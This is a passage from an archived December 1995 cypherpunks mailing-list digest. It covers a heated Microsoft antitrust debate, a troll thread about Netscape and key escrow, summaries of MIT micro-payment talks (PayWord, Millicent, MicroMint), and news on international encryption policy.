domination can, and generally does, stifle competition, > but it also kills innovation of alternatives. Software companies > are too busy kissing arse with Bill, and threatened by Bill, > to release software on other systems say unix or os/2. this is a subjective matter. you continually lace your claims with many subjective claims that have no basis in fact. who is to decide what is unfair and what is not? answer: a court. so far, no court has agreed with you that MS has been involved in unfair trade. you seem to believe that you are the authority. you have failed utterly to give a single concrete instance of how Microsoft is *unfairly* stifling competition, although you have infinite innuendos and seem to think that merely by saying things like "OS2" in your writing that you have proved your case. it may be that Microsoft "stifles" competition because all of its competitors are simply *choosing* not to compete with them on certain platforms and areas. now, *no*amount*of*legislation* will change what a company decides of their own free will in this manner. why is it a horrible calamity if other companies voluntarily *choose* not to compete with microsoft? is microsoft putting a gun to anyone's head not to compete with them? are they essentially paying people not to compete with them? are they trying to sabotage their competitors by contract killings on their programmers? no, they are succeeding because they have a *superior product*, *nothing* more sinister than that is going on. no amount of wet-tissue-paper conspiracy theories ranting about API documentation is going to change that. > a perfect example is Corel. Corel was _very_ enthusiastic to > release for OS/2, in fact they were ported to OS/2 before W95 > released. Shortly after the announcement, the honcho reversed > positions and canceled Rev 6 for OS/2 stating that Rev 2.5 which > has existed for some time, was "adequate" for OS/2. I am not going > to expose my inside source, as their will be retribution. why is this a problem? companies change their course all the time based on the competition. you think this is the first time a company decided to change course when they found out what a powerful competitor was doing? *wrong*. obviously. but because MS is involved, you seem to think this is a horrible injustice for mankind. there's no doubt that people voluntarily choose not to compete with MS. MS voluntarily decided not to compete with Intel for chip fabrication!! *surprise*.. likewise many software companies choose not to compete with MS in particular areas that MS has *won* through hard work. MS is in the position of a marathon runner, not a tyrannical despot as you imply. the *moment* that MS makes a bad strategic decision or trips from their relentless pursuit of customer satisfaction, any one of the numerous hyenas nipping at their hyenas will take advantage of the slip. > 3) you are totally ignoring the comments on anti-thrust and restraint > of trade. In general market terms, anti-thrust is less important > than restraint of trade --Bill _clearly_ violates the rules on > restraint of trade, and therefore should be dismembered to avoid > lack of innovation as in #2 above. no amount of times of saying "Bill clearly violates [x]" will prove your case without concrete examples, none of which you have provided. furthermore, you are correct in that I am ignoring many of your comments about "markets". you don't seem to understand this point: MS dominates in markets that they *created*. MS *created* the "widget" market. then to have other companies and individuals such as yourself screech that they are being "excluded" from this market is the height of hypocrisy, when these people voluntarily decided to "opt out" at an early stage. this basic point of mine in my prior essay totally sailed over your head. antitrust laws make sense in *pre*existing* markets that have come to be dominated by a single company, a "monopoly", that seems to be trying to stifle competition. e.g. there are 5 railroad companies, then suddenly there is only 1 that charges highway robbery. or, series of [x] barons collude to price fix. what has MS done that stifles competition? they stifle competition not by trying to overtly prevent companies from competing. they "stifle competition" by being the best there is. and you are free to change this by creating better software. so far they are so ingenious in creating brilliant software that no one has come close to their prowess. why do you think that antitrust laws are the panacea for all problems in markets? you haven't even proven that MS is a problem, you just take that as a given. then you presume that because antitrust laws exist, they must be sacred and they must apply. well, you look pretty silly to me trying to apply your 19th century antitrust laws and feebleminded market ideas to a state-of-the-art 20th century market that is doing just fine, thank you very much, without interference from legislative busybodies like YOU. do you recall the RAM "crisis" of a few years ago in which the Reagan administration accused Japan of "dumping" RAM chips? do you consider this a success of legislation applied to high tech markets? if so you are in the minority of all people in the technology industry. now, dear sir, I admit that there are unethical businessmen, and I do believe that government antitrust laws make sense when a single businessman or a set of them are conspiring to seize a market and *prevent*competitors* from even participating in that market. but nothing MS has done prevents competitors a-prior. it is a far different thing to have some kind of skullduggery that prevents others from even attempting to get into business (such as blackmail, sabotage, manipulating their employees, manipulating resources, etc.). however we have a clearcut situation in which various companies are simply voluntarily *choosing" not to compete with microsoft. and you complain there is not enough "innovation" in the technological field? you think MS' dominance is preventing "innovation"? this is the most utter ridiculousness I've heard in many years, and I'm embarrassed to see these thoughts on the CP list, although not surprised they come from someone without any interest in revealing their identity. > 4) you clearly have no concept of American free market policy. Yes, > you may be very successful, even filthy rich, but when you > stretch your rights to clearly offend the public interest, then > anti-trust and restraint of trade laws serve the _needs_ of a > free and _competitive/innovative_ market. these things you talk about with breathless patriotism are all *subjective*. its *subjective* whether a given company is preventing competition or free trade. there may be legislative criteria, but they are only subjective guidelines that the courts have to try to figure out. you talk about operating systems as if it is a "public interest" area. well, sir, it seems to me you can manipulate any company to any ends you like by insisting that what they manufacture, after all, is in the "public interest" and therefore this merits legislative brainless busybodiness. furthermore your silly effusive rhetoric above again fails utterly to tangibly demonstrate that MS is engaged in "unfair" practices. again you seem to believe that MS is involved in unfair practices because 1. Gates is the richest man on the planet 2. other companies avoid competing with MS in some areas 3. OS2 is not as successful as windows 4. gosh darn it, there isn't enough *innovation* in software right now > America does not serve dinner to merchants who rape, pillage, and > burn --as Bill Gates has crushed his opponents; the barbarians > are punished. There are grounds for criminal charges in Bill's > actions. all I can say is, hee, hee. Bill Gates is ruthless, I grant you that: he's ruthless in cutting the crap out of his products and the hot air that customers *don't* want, and putting in the concrete meat that people crave, and the marketplace has virtually deified him. to argue with MS's dominance is to argue against the people who buy his products. why do you think they made the wrong choices? with their own cash? your legislative solution are designed to make decisions that individuals are quite happy to make by themselves, thank you very much. > 5) you are incorrect in your assumptions that Gates was sued > anonymously. I didn't say that. I said that his throat-slashing attackers would *like* to be anonymous, as you delightfully prove. >In the initial action by the DOJ, competitors were > _asked_, by subpoena, for factual information by the DOJ. The > _DOJ_ provided the shield in so much as Bill's barbarian actions > were of sufficient interest that evidence providers desired and > were given protection --not much different than the Federal > Witness Protection program. oh brother. yes, Bill is going to go out and hire hit men to get back at all his enemies. (hee, hee, once again). what you fail to understand is that if Bill decides that other companies are trying to slash his own company's wrists, he has full authority to make business decisions regarding their declared enmity. apparently your miracle system would be the following: any company can lodge an anonymous complaint against their enemy and tie that enemy up in court without revealing their own identity. after all, we need to *protect* those accusers, don't we?? heh. in all your sparkling effusion about America (oh, I can hear the flag flapping in the breeze behind you, god, this country is great) you fail to consider the ideas about "confronting ones accuser" deemed important enough to stick in the bill of rights... can you reiterate why you think Bill is a "barbarian"?? hee, hee. > when CI$ and the rest banded together to protest Bill's obvious > restraint of trade and stonewalling on hooks to Win95 for three > months after Win95 released, they did not, and _could_ not, do > so anonymously. yes, what a pity they could not. let me tell you, I really feel your pain. hahahahaha. > 6) how much is Bill paying _you_ for your efforts? You obviously have > too much of an interest in the commercial outcome to be so ignorant. my efforts in what? I have no financial ties to microsoft. I have friends that work there. I have met plenty of people such as you who I think simply fail to understand the concept of free enterprise, which does *not* promote equality. in fact it rewards those people fantastically who can anticipate markets and give consumers precisely what they want. and for this brilliant gift of Gates' which is perhaps unparalleled in the history of business (imho), you would like to cut up his painfully constructed kingdom so that other people have a "chance" to "compete" in markets that Microsoft actually originally created. > 7) Your beliefs are one thing --state 'em, but don't speak for America > until you know the definition of the "public interest" and have > some concept of anti-trust and restraint-of-trade legislation and > court rulings which have set the guidelines. clutch it in, > _after_ your brain is in gear. your using terms such as "anti-trust" and "restraint of trade" do not make you any authority either. I freely admit I am not an expert, but I also think that its translucently obvious to even some of the most uneducated of people that 1. if there are laws, they can be misapplied by bureacrats to manipulate companies. a situation where companies can sabotage each other merely through litigation is a very serious red flag. 2. because a company is not doing well in the marketplace, is not reason to introduce legislation or litigation against a successful company. it is a reason to REJOICE that the market has sent a CLEAR MESSAGE about WHAT IT DOESN'T WANT. any amount of whining and pleading by executives in this company or their sniveling sycophants does not change this *basic* reality. IBM got a massive reality check in the marketplace in the early 80's. no matter how much they though they were sacred, the *market* told them to **** off!!! because they didn't have a clue, and failed to listen to people who were *offering* them clues for free (Bill Gates) included. and you whine that IBM "didn't sabotage themself", that "they weren't their own worst enemy", they just didn't "adjust". oh, the grisly horror. they had half a decade or more to get a clue about what the industry wanted, and it didn't tolerate their egocentric vaporideology. cypherpunks, rejoice. 3. furthermore, because a lot of people hate a company and think that they ought to be restrained, DOES NOT MAKE THIS LEGITIMATE or ACTIONABLE. people are notorious for wanting things they don't really want in the long run, not understanding the full consequences of their own demands. that is, perhaps even demanding something that is self-contradictory (i.e. "kill microsoft so that we can get more software innovation", apparently your own view). 4. antitrust laws were invented in the 19th century and originally were related to railroad price gouging. there was some real skullduggery going on in this period imho, but to compare Gates to these "robber barons" is a disservice to humanity and a black mark on your karma record, imho what is my hidden agenda? to see the truth as it stands, when everyone around is trying to see the truth that fits their hidden agenda. its a rare gift and a curse I assure you but it's known as "speaking one's truth". as someone who has written software and understands the difficulty of *pleasing*customers*, I congratulate Gates as a brilliant pioneer and visionary of the 20th century and say a pox on all his detracters that paint him as a "barbarian" for his sterling accomplishments in *customer*service* in an insanely difficult enterprise (software development). I wouldn't have responded to your last message if you had more coherently rebutted the actual message of my original essay. as it stands I just thought I would sent this little missive to further highlight your own cluelessness and decrease your reputation on the list. having done this, I think now I will probably just ignore you as inconsequential or take fun intermittent potshots at you. sweet dreams!! From gbroiles at darkwing.uoregon.edu Thu Dec 21 01:03:10 1995 From: gbroiles at darkwing.uoregon.edu (Greg Broiles) Date: Thu, 21 Dec 95 01:03:10 PST Subject: The Problem With Blaze And Weinstein Message-ID: <199512210902.BAA03598@darkwing.uoregon.edu> At 01:12 AM 12/21/95 GMT, "Bill Gates" wrote: [...] >Evidently the cypherpunks are all too impressed >with Blaze and Weinstein's master degrees to see >what's really happening. Only true visionaries >like myself and Dr. Frederic B Cohen are telling >it like it is; everyone else has had the wool >pulled over their eyes by the NSA/ATT/Netscape axis. > >It's amazing how clear everything becomes once >one stops taking the medication that THEY prescribed. > >s/ Bill Gates Oh, I see. I think you misspelled "troll". Hope this helps. -- "The anchored mind screwed into me by the psycho- | Greg Broiles lubricious thrust of heaven is the one that thinks | gbroiles at netbox.com every temptation, every desire, every inhibition." | -- Antonin Artaud | From jsw at netscape.com Thu Dec 21 01:03:57 1995 From: jsw at netscape.com (Jeff Weinstein) Date: Thu, 21 Dec 95 01:03:57 PST Subject: King Kong Does e$ In-Reply-To: <199512201719.JAA12291@jobe.shell.portal.com> Message-ID: <30D92197.7C87@netscape.com> Hal wrote: > But this influence is making us a target of companies who know that > gaining our approval, or at least avoiding our criticism, is important > for success on the net. In many cases, such as the recent flap over > Netscape's attitudes towards key escrow, I detect a whiff of two > sidedness, in which one attitude is presented for the benefit of > government and law enforcement interests, while another posture, more > acceptable to cypherpunks, is adopted on the net. At the NIST meeting our representative made a strong statement against the governments GAK proposal, and government interference with crypto in general. If I'm not mistaken that was a government and law enforcement forum. We want to sell (and give away) products that contain strong encryption, and our customers want to buy it. We are beginning to take a more active role in trying to achieve this goal. Its not happening fast enough for me either, but it is happening. --Jeff -- Jeff Weinstein - Electronic Munitions Specialist Netscape Communication Corporation jsw at netscape.com - http://home.netscape.com/people/jsw Any opinions expressed above are mine. From jsw at netscape.com Thu Dec 21 01:54:28 1995 From: jsw at netscape.com (Jeff Weinstein) Date: Thu, 21 Dec 95 01:54:28 PST Subject: The Problem With Blaze And Weinstein In-Reply-To: <199512202018.UAA02824@pangaea.ang.ecafe.org> Message-ID: <30D92D80.1CED@netscape.com> ECafe Anonymous Remailer wrote: > > I'm not trying to start a flame war. I'm > sure these people are very smart and have > written lots of good code. I'm sure they're > very nice and never kick their dogs. I'm > just tired of people defending them as > cypherpunks. > > They aren't cypherpunks. > > Neither has come out against GAK. They > both carefully avoid commiting to any > statement. They want us to think they're > "one of us" but they don't want to be > pinned down because they are double dipping > on both sides of the fence. > Weinstein is actively promoting GAK by > working at the company that the government > has chosen to bring it to you now that > att has failed. I am against GAK. I have been contributing to EFF for years. I have written and faxed my representatives in congress stating my position against both GAK and government censorship of the net. The reason I'm working on security code at netscape is that I think it may be the only way to foil the government's plans to remove all privacy from its citizens is mass market strong encryption software. Why do you believe that Netscape has been chosen by the government to bring GAK to the masses? Because of the uninformed and misguided comments of Jim Clark? Jim has been educated and the company has taken a firm position against government control of crypto. When you go to the store today and buy netscape you get strong encryption out of the box, without any GAK. --Jeff -- Jeff Weinstein - Electronic Munitions Specialist Netscape Communication Corporation jsw at netscape.com - http://home.netscape.com/people/jsw Any opinions expressed above are mine. From cpunk at remail.ecafe.org Thu Dec 21 02:17:27 1995 From: cpunk at remail.ecafe.org (ECafe Anonymous Remailer) Date: Thu, 21 Dec 95 02:17:27 PST Subject: The Problem With Blaze And Weinstein Message-ID: <199512211018.KAA02190@pangaea.ang.ecafe.org> I was not interested in starting a flame but I seem to have ignited one. I'm sorry about that. Since almost nobody sees these people from big corps as having a conflict of interest by being here I am willing to drop the subject having raised the point. It just seemed funny to me that cypherPUNKS would be so happy to have these fortune 500 types running the show. I guess I see the point that these people have something to contribute as long as they are honest about who they are. I have to say it rubs me wrong though. Like I said I've written a lot of code in my day and many of you are probably running some of it while you read this (enough said). I just don't want to depend on att or netscape to protect me. Even if they do a good job the cost of using their stuff is too high (for example the fine print in that att product). Lets write our own code and gpl it so no one can take it away! s/ Bill Gates From RDHeffren at gnn.com Thu Dec 21 04:00:32 1995 From: RDHeffren at gnn.com (Robert Heffren) Date: Thu, 21 Dec 95 04:00:32 PST Subject: COMMUNITY CONNEXION PIONEERS PRIVATE ELECTRONIC COMMERCE Message-ID: <199512211159.GAA01454@mail-e1a.gnn.com> -----BEGIN PGP SIGNED MESSAGE----- On 19 Dec 95, sameer wrote; > COMMUNITY CONNEXION PIONEERS PRIVATE ELECTRONIC COMMERCE > Community ConneXion today announced a new service for its customers > which will make secure, private electronic commerce more accessible > to all merchants, from the small single-person business to large > corporations trying to sell goods and services over the > world-wide-web. There went the neighborhood. The Prez and the Coalition on one side and big biz on the other. AOL and their stings, all the motherfuckers spamming the piss out of everybody else and every place you turn, some swinging dick wants to put his goddamn hand in your pocket. Fuck it! Shut this sonfabitch down and take up doll-collecting. Who NEEDS this bullshit! Unsub this bastard AND gone; -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQB1AwUBMNlMrBMzypiVqpjNAQG/fAL9GS5NiWR/5mb+KbKwxp2wSB6MUliwJaEV uBb+a7F5s7PQ0lQEWfujPKIoaF/iCB0zRKN0yLWCuvNiQe3YWMnwn5WggPekDRPl 0b3u37WHmeCKyhamMixnyK4w7jjT2use =WaxG -----END PGP SIGNATURE----- From fc at all.net Thu Dec 21 04:39:15 1995 From: fc at all.net (Dr. Frederick B. Cohen) Date: Thu, 21 Dec 95 04:39:15 PST Subject: Gates history In-Reply-To: <199512210204.SAA26757@netcom20.netcom.com> Message-ID: <9512211235.AA29804@all.net> Not that this subject matter is relevent to cypherounks, but... > cpunk relevance: operation of the free market ??? > Gates' conquests can either be made out to be a failure of the free enterprise > system or a success from it. the more I read whining complaints about MS's > dominance, the more I prefer the latter interpretation. perhaps power > corrupts, but on the other hand failure clearly promotes whining. "you cannot > grow taller by chopping off the heads of others". I respectfully disagree with the analogy. In a competitive market economy, you can indeed grow larger by killing off the competition. In fact, that's the whole idea of unfettered capitolism. This was tried 100 years ago and the result was monopolies which in the end eliminated competition and ended up reducing innovation and productivity while increasing prices. Then the US government decided to end this by introducing laws to limit monopolies. The broke up AT+T and essentially forced IBM to become weak in the name of fairness, but when Bill Gates brought Microsoft into the same position, the government failed to act (and is continuing to do so). This is (in my opinion) because Ron Raegan was so influential as president and heavily favored unfettered free trade. > I've seen so many people try to smear MS with innuendo, as if "enough people > being unhappy" at a company is ample evidence that there is "unfairness". > the marketplace is *not* fair. it rewards people who are in tune with it > disproportionately!! sometimes, *dramatically*so* as in the case with Gates. Inuendo or not, there are clear facts that have been widely documented regarding Microsoft (Bill Gates doesn't run it alone you know!). Among them are: - Microsoft forces dealers to buy only Microsoft software bundles if they want to use ANY microsoft products in their PCs at discount prices. I have been personally caught in this one. I had a calendar product a few years back that was marketed to about 1,000 of the largest microcomputer dealers and bundlers in the US. Not one would buy the product, and the reason they gave was that they were not allowed to bundle any non-Microsoft-approved software without losing their ability to sell the Microsoft bundles. This is not a case of sour grapes - it's just plan fact. That is what the dealers said - not just one of them. - Microsoft has historically used undocumented operating system calls which they provided details on to select software companies and which they used for their own products, but which they did not release to the greater market place. Without the use of these undocumented calls, many operating system features were not usable. The net effect was that companies not on the Microsoft chosen list were delayed in delivering new versions of products to meet new versions of operating systems, giving Microsoft and companies they worked with a market advantage. - Microsoft holds a dominant market position. This is a necessary component of the situation because if the same facts held for a non-dominant company, it would be within bounds of the law and would not stifle free trade. > a market for [x] gizmos does not even exist. a brilliant > person says, " I think people really need [x] gizmos. I'm going to make and > sell them. I'm going to find people who will help me, but if I can't find any > I'm going to do it all myself". Nobody is disagreeing with this. That is the desirable part of what Gates and Microsoft did - 20 years ago. But the standards we hold and the requirements we place on companies increase with their size and market dominance. This is done in the name of keeping a thriving competitive environment. In today's environment, Microsoft is dominating the market and thus reducing innovation (or so the theory goes) by using anticompetitive methods, and that is the issue. In my personal opinion, they are doing something far worse. By dominating the market with inferior products, they are essentially forcing the world to build an artificially weakenned global network environment. The net effect will be years of new versions of the Microsoft product line without a single bug fix (they call them feature enhancements). > Gates is such a person and did it with PC OS'es and various windows > applications (Excel, Word Perfect, etc.). he bet his entire future on > the idea that he knew what people wanted even when other companies disagreed. This is factually inaccurate. Microsoft created inferior versions of existing products that have only come to market dominance because of anticompetitive methods. For example, Excel has numerour bugs and produces wrong answers at a rate far in excess of 123. It is truly an inferior product, and yet it now dominates the market - solely because it is bundled with other microsoft products and because interoperation between 123 and Microsoft products is delayed due to undocumented features and changes in the underlying Microsoft operating system. Microsoft did not bet its fortune, nor did Bill Gates, on Excel, WordPerfect, or any other of their applications. With a few exceptions, they took existing products, built their own versions, used inside information and their dominant market position to force the products on PC dealers, and continue to do so. ... > the truth is that the playing field has always been level, but because Gates > is such a brilliant genius, market anticipator, and gizmo producer, he > succeeds far beyond his or anyone else's wildest dreams. It's just not accurate. IBM, until recently, was barred from selling more than a certain dollar value worth of units. Bill Gates didn't build Microsoft alone either. He has thousands of employees. Admitidly he was a driving force, but his team members are largely responsible for his success, and I think he would readily agree to this if you asked him. > the market has *given* bill gates his dominance. all the arguments about > him being "unfair" are absolutely bogus that I have seen. they amount to, > "Bill Gates is using tactics to sell more of his software than his competitors. > therefore, he's not being fair to everyone else who wants to sell their > software as well." That's not what people are saying. They are saying that Microsoft is breaking the law of the land and has been for a long time and that is why they have market dominance. Whether the law has been broken or not, you are mischaracterizing what has been said about Microsoft. Enough of this - sorry for the noise, and let's get back to what cypherpunks are about - cyphers. -> See: Info-Sec Heaven at URL http://all.net/ Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236 From roy at cybrspc.mn.org Thu Dec 21 05:10:05 1995 From: roy at cybrspc.mn.org (Roy M. Silvernail) Date: Thu, 21 Dec 95 05:10:05 PST Subject: Microsoft Flame[tm] [NOISE] Message-ID: <951221.063231.9N5.rnr.w165w@cybrspc.mn.org> -----BEGIN PGP SIGNED MESSAGE----- There's a lot of finger waving going on over Microsoft's alleged predatory practices. I just want to remind the pro-MS folks of something. Microsoft has a documented track record of using undocumented entry points in their OS and Windows products. These entry points allow MS apps to do some things more efficiently than a competitor which uses the published API. MS has been known to rearrange these undocumented calls, resulting in sudden incompatibilities with competitors. (remember when Win3.1 came out and DR-DOS was suddenly unable to run Windows?) And in the MS countersuit against Stac Electronics, MS successfully argued that undocumented system calls were protected as Trade Secret material. While this isn't the grand-scale conspiracy some people seem to see, IMHO it's still predatory. Perhaps the call to separate the OS and apps divisions is a good idea. It would be interesting to see if Microsoft could maintain its edge in applications when it had no sub rosa advantage in OS access. - -- Roy M. Silvernail [ ] roy at cybrspc.mn.org PGP Public Key fingerprint = 31 86 EC B9 DB 76 A7 54 13 0B 6A 6B CC 09 18 B6 Key available from pubkey at cybrspc.mn.org -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBMNlXShvikii9febJAQFoGgP/YtHdGqO8++MfZmk3h61F8SmJBfPYfa1R JlccdIP9BZHVXZseao9b9DqxLY1xRYkK6fWETielJaSjXZKam1WlYKFzL5E8Hf1z IXQmj7rCIIfvqvq3byJq8B3IUbT4UnTMNDAHVlNUwkzrcJ+py8czsWtNy15g3ahY NzYL8UsOtwI= =MpV3 -----END PGP SIGNATURE----- From avatar at mindspring.com Thu Dec 21 05:13:46 1995 From: avatar at mindspring.com (avatar at mindspring.com) Date: Thu, 21 Dec 95 05:13:46 PST Subject: cyphernomicon Message-ID: <199512211313.IAA11974@borg.mindspring.com> If anyone is interested I would be willing to e-mail a copy of the cyphernomicon to you. BEWARE that it is 1.3MB in file size and 414 pages in text. Charles Donald Smith Jr. 582 Clifton Rd. N.E. Atlanta, Ga. 30307-1787 (404)-378-7282 From BRUEN at mitlns.mit.edu Thu Dec 21 05:29:49 1995 From: BRUEN at mitlns.mit.edu (Bob Bruen, MIT Lab for Nuclear Science) Date: Thu, 21 Dec 95 05:29:49 PST Subject: The Problem With Blaze And Weinstein Message-ID: <951221083022.2460067b@mitlns.mit.edu> > MIT is practically floating on government subsidies. It's funny how the grass is always greener somewhere else... Bob From perry at piermont.com Thu Dec 21 06:34:10 1995 From: perry at piermont.com (Perry E. Metzger) Date: Thu, 21 Dec 95 06:34:10 PST Subject: The Problem With Blaze And Weinstein In-Reply-To: <9512210012.AA19612@zorch.w3.org> Message-ID: <199512211432.JAA00971@jekyll.piermont.com> hallam at w3.org writes: > On the one hand we have the screaming libertarians with a bunch of > wedged political notions about property. On the other we have what > appear to be arch anti-capitalists claiming that nobody who earns > a living out of crypto can be a cypherpunk. What is really strange > is that these appear to be the _same_ people. No, Phil. We have just one person who's an annoying nutcase who's been bothering us, and lord knows what he really thinks. .pm From perry at piermont.com Thu Dec 21 06:37:17 1995 From: perry at piermont.com (Perry E. Metzger) Date: Thu, 21 Dec 95 06:37:17 PST Subject: The Problem With Blaze And Weinstein In-Reply-To: <199512210112.BAA05503@pangaea.ang.ecafe.org> Message-ID: <199512211437.JAA00982@jekyll.piermont.com> Rolling on floor... .pm ECafe Anonymous Remailer writes: > I'm not trying to start a flame war, just telling > people what's REALLY happening. [...] > ATT and Netscape are both tools of the CIA/NSA. [...] > Evidently the cypherpunks are all too impressed > with Blaze and Weinstein's master degrees to see > what's really happening. Only true visionaries > like myself and Dr. Frederic B Cohen are telling > it like it is; [...] > It's amazing how clear everything becomes once > one stops taking the medication that THEY prescribed. > > s/ Bill Gates From dmandl at bear.com Thu Dec 21 06:50:04 1995 From: dmandl at bear.com (David Mandl) Date: Thu, 21 Dec 95 06:50:04 PST Subject: KOD In-Reply-To: <199512202258.RAA13656@pipe2.nyc.pipeline.com> Message-ID: On Wed, 20 Dec 1995, John Young wrote: > >Can you reveal who they are? No way am I going to buy > >Newsweek to find out. > > Anyone out of Newsweek's range, return this msg, empty, to me > to get the 50 mugshots, then ... sort out the living from the > dead. I send for copies of John's articles almost every day (thanks, John). I was fooled this time because the reply codes are ALWAYS of the form AAA_bbb, and this time it was just AAA. It went right by me. There must be a psychology lesson in here somewhere. So did Pipeline finally upgrade their software, or what? > Best not to cypherdunk the already nym-shot victims. Privacy is > paramount, bellows this list, no? Um, sure, John. Cypherpunk relevance: There's apparently an encrypted message in John's last paragraph above. A free T-shirt to the first person to find it. --D. -- David Mandl Bear, Stearns & Co. Inc. Phone: (212) 272-3888 Email: dmandl at bear.com -- ******************************************************************************* Bear Stearns is not responsible for any recommendation, solicitation, offer or agreement or any information about any transaction, customer account or account activity contained in this communication. ******************************************************************************* From james at sparta.lcs.mit.edu Thu Dec 21 08:01:10 1995 From: james at sparta.lcs.mit.edu (James W. O'Toole Jr.) Date: Thu, 21 Dec 95 08:01:10 PST Subject: brief review of MIT 12/15/95 "micro-commerce" talks Message-ID: <9512211605.AA17350@sparta.lcs.mit.edu> This is a quick summary of the Friday 12/15/95 talks at MIT on micro-commerce: Millicent --- Mark Manasse, Digital Equipment Corporation Brokers purchase "scrip" in large batches from vendors; users purchase scrip small batches from brokers; users give small scrip to vendors in each purchase transaction. "Scrip" is vendor-specific and its validity can be efficiently verified using hashing. No public-key crypto is required to carry out the protocols, because pairwise trust relationships between user and broker, and between broker and vendor, are established and these pairs share secrets. PayWord --- Ron Rivest, MIT Users are issued certificates by brokers, indicating that the broker will extend credit to the user. Users generate long hash-chains by repeatedly hashing a random seed value to obtain a hash-chain root. Then the user promises to a specific vendor that he will pay one cent per element of that hash-chain. This promise is made by the user signing (using PKC) the root of the hash chain. Each time the user wants to pay one cent to the vendor, she sends another element of the hash-chain, working backwards from the root, as in the S/Key system. The vendor redeems the whole chain (or whatever portion the user has spent) by sending the user's signed promise and the last spent element of the chain to the broker. MicroMint --- Adi Shamir A scheme for issuing coins that is much more like traditional physical coin systems in that forgery and cheating are possible, but only practical on a large scale, and are detectable and can be combatted. A "coin" in the MicroMint system is a set of 4 values that hash to the same value. Producing such 4-way-colliding values is much less expensive in bulk than individually. The mint produces coins in bulk and will redeem them into cash. To combat active forgers, the mint can embed secrets in the coins and reveal the secrets progressively so that vendors can detect forged coins cheaply. Lightweight Signatures for Revocation --- Silvio Micali, MIT A cost/performance analysis of the key revocation system for the U.S. Federal Goverment's Public Key Infrastructure. Taking a MITRE-designed plan as a starting point, the communications costs are analyzed. In the MITRE plan, the certification authorities issue revocation lists on a semi-weekly or daily basis, these lists being then stored in an untrusted and highly replicated database. When a public key is being checked, the receiver queries the database to determine the status of the public-key. In the talk, Silvio showed how lightweight signatures can be used to reduce the size (and therefore transmission cost) of the revocation lists. He also showed that transmission costs can be dramatically reduced by not sending large revocation lists in response to queries. Instead, the replicated database can store a timestamped key-status-report (signed by the certification authority) for every single key. This key-status-report is much smaller than the full revocation list. Overall, the PayWord scheme is probably the one to watch for actual use on the Internet. Millicent has an advantage of not using PKC, but PayWord may be simpler to implement and is being discussed in the WWW Consortiom and the IETF as a possible draft standard. It is also worth noting that PayWord operates essentially by combining a PKC-signature-based authentication (between user and broker) with a One-Time-Password (OTP) authentication scheme (as in the S/Key system). OTP has been getting standardized recently on the Internet and maybe that will help too. From jya at pipeline.com Thu Dec 21 08:05:48 1995 From: jya at pipeline.com (John Young) Date: Thu, 21 Dec 95 08:05:48 PST Subject: Encryption Rules Coming Message-ID: <199512211605.LAA00150@pipe3.nyc.pipeline.com> Financial Times, December 21, 1995, p. 4. Encryption rules to be prepared By Andrew Jack in Paris Representatives of international business and government yesterday agreed to draw up guidelines on encryption, a system which allows computer users to transmit information electronically with little risk that it can be intercepted and understood by unauthorised "hackers". The meeting, which was held at the International Chamber of Commerce in Paris, could lead to formal propositions prepared jointly by business and government organisations that could be ready by as soon as next summer. Yesterday's meeting did not have any formal legal authority, but was highly significant as the first forum where so many representatives of governments businesses and computer experts met to discuss developments in encryption. Highly sophisticated encryption technology already exists in a number of countries including the US and Sweden. In the US, companies already have access to these programs. A growing number of businesses -- led by the banking sector -- are demanding access to these programs. However, many governments, including that of the US, have resisted permitting the technology to be exported because they fear it will fall into the hands of organised crime and terrorist organisations. They have demanded that they should be able to "hack" into computer transmissions for counter-intelligence and criminal investigation work, in the same way that they can conduct telephone-tapping exercises. An important conclusion of yesterday's Paris meeting was that business agreed in principle to allow such hacking to take place as long as sufficient safeguards were in place and "electronic search warrants" had been issued with proper judicial approval. A number of governments appear willing to permit relaxation of export controls on sophisticated encryption devices as long as these safeguards are in place. Among the issues that experts on both sides need to resolve are the ways in which "keys" allowing computer transmissions to be decoded would be handled. A number of business organisations have discussed the use of third-party organisations, which would be independent of government, would have the keys and would hand them over to government investigators when demands were justified. However, the organisations still have to resolve a number of issues, including how these custodians could be made legally liable for any unauthorised access to this information and for the costs of its misuse. [End] ---------- Does anyone have press reports or more information on this meeting? Any connection to the recently signed Transatlantic Agenda? From samman-ben at CS.YALE.EDU Thu Dec 21 08:07:30 1995 From: samman-ben at CS.YALE.EDU (neB .veR) Date: Thu, 21 Dec 95 08:07:30 PST Subject: KOD In-Reply-To: Message-ID: On Thu, 21 Dec 1995, David Mandl wrote: > > Best not to cypherdunk the already nym-shot victims. Privacy is > > paramount, bellows this list, no? > > Um, sure, John. > > Cypherpunk relevance: There's apparently an encrypted message in > John's last paragraph above. A free T-shirt to the first person to > find it. Um....I think that's just his writing style. Ben. PS: I've just finished the first copy of a zero-knowledge client/server application. Its really basic--I'll be adding BBS to it RSN. IF you want it, mail me. PPS: There's no crypto--just Fiat-Feige-Shamir ZKIPofI. Can I export this? ____ Ben Samman..............................................samman at cs.yale.edu "If what Proust says is true, that happiness is the absence of fever, then I will never know happiness. For I am possessed by a fever for knowledge, experience, and creation." -Anais Nin PGP Encrypted Mail Welcomed Finger samman at powered.cs.yale.edu for key Want to give a soon-to-be college grad a job? Mail me for a resume From jamesd at echeque.com Thu Dec 21 08:34:44 1995 From: jamesd at echeque.com (James A. Donald) Date: Thu, 21 Dec 95 08:34:44 PST Subject: The Problem With Blaze And Weinstein Message-ID: <199512211634.IAA22811@blob.best.net> >ECafe Anonymous Remailer wrote: (A bunch of ridiculous nonsense) At 01:48 AM 12/21/95 -0800, Jeff Weinstein wrote: > I am against GAK. I have been contributing to [...] Please do not reply to silly trolls. By replying, you act as if what this loon said mattered. --------------------------------------------------------------------- | We have the right to defend ourselves | http://www.jim.com/jamesd/ and our property, because of the kind | of animals that we are. True law | James A. Donald derives from this right, not from the | arbitrary power of the state. | jamesd at echeque.com From jya at pipeline.com Thu Dec 21 08:39:40 1995 From: jya at pipeline.com (John Young) Date: Thu, 21 Dec 95 08:39:40 PST Subject: KGB_cia Message-ID: <199512211639.LAA04102@pipe3.nyc.pipeline.com> 12-21-95. WPutz: "In an unusual interview Yevgeny Primakov, head of the Russian Foreign Intelligence Service, discussed problems and challenges facing his intelligence agency in terms that often sounded like testimony that CIA Director John M. Deutch gave the House intelligence committee Tuesday. In comments that echoed those of his U.S. counterparts, Primakov charged that some post-Cold War budget cuts in his agency developed 'because the [Russian] press ganged up on us [and] many newspapers wrote absurd things about us, including statements that foreign intelligence was no 